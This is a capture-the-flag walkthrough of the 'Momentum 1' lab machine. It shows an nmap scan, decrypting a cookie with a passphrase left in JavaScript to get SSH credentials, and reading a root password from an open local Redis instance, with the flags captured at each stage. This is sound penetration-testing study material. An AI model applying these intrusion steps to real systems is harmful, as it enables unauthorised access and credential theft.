Momentum 1
Port recognition with nmap
┌──(root@ghost)-[/home/ghost]
└─# nmap --min-rate 5000 -sV momentum.vuln --script=http-enum
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-28 19:48 EST
Nmap scan report for momentum.vuln (10.0.2.239)
Host is up (0.000061s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
| /img/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_ /manual/: Potentially interesting folder
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:FC:30:16 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.80 seconds
The nmap scan with the http-enum script reveals a few routes.
┌──(root@ghost)-[/home/ghost]
└─# curl http://momentum.vuln/js/main.js
function viewDetails(str) {
window.location.href = "opus-details.php?id="+str;
}
/*
var CryptoJS = require("crypto-js");
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
*/
Visiting /js/ lists main.js. Its commented-out block shows how a value is decrypted with CryptoJS AES using the hardcoded passphrase "SecretPassphraseMomentum".
After visiting http://momentum.vuln/opus-details.php this cookie is set:
cookie: U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt
┌──(root@ghost)-[/home/ghost]
└─# cat dcrypt.js
var CryptoJS = require("crypto-js");
// cookie value set by opus-details.php
var encrypted = "U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt";
// passphrase taken from the commented-out block in main.js
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
Completing the commented-out snippet with the cookie value gives a script that decrypts it:
┌──(root@ghost)-[/home/ghost]
└─# nodejs dcrypt.js
auxerre-alienum##
The decrypted value gives us credentials.
┌──(root@ghost)-[/home/ghost]
└─# ssh auxerre@momentum.vuln
auxerre@momentum.vuln's password:
Linux Momentum 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 22 08:47:31 2021
auxerre@Momentum:~$ cat user.txt
[ Momentum - User Owned ]
---------------------------------------
flag : 84157165c30ad34d18945b647ec7f647
---------------------------------------
We log in over SSH as the auxerre user with the password auxerre-alienum##.
auxerre@Momentum:~$ ss -tnl
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 127.0.0.1:6379 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 [::1]:6379 [::]:*
LISTEN 0 128 *:80 *:*
LISTEN 0 128 [::]:22 [::]:*
A Redis instance is listening on localhost only (port 6379).
auxerre@Momentum:~$ redis-cli
127.0.0.1:6379> keys *
1) "rootpass"
127.0.0.1:6379> get rootpass
"m0mentum-al1enum##"
127.0.0.1:6379> exit
auxerre@Momentum:~$ su root
Password:
root@Momentum:/home/auxerre# cat /root/root.txt
[ Momentum - Rooted ]
---------------------------------------
Flag : 658ff660fdac0b079ea78238e5996e40
---------------------------------------
by alienum with <3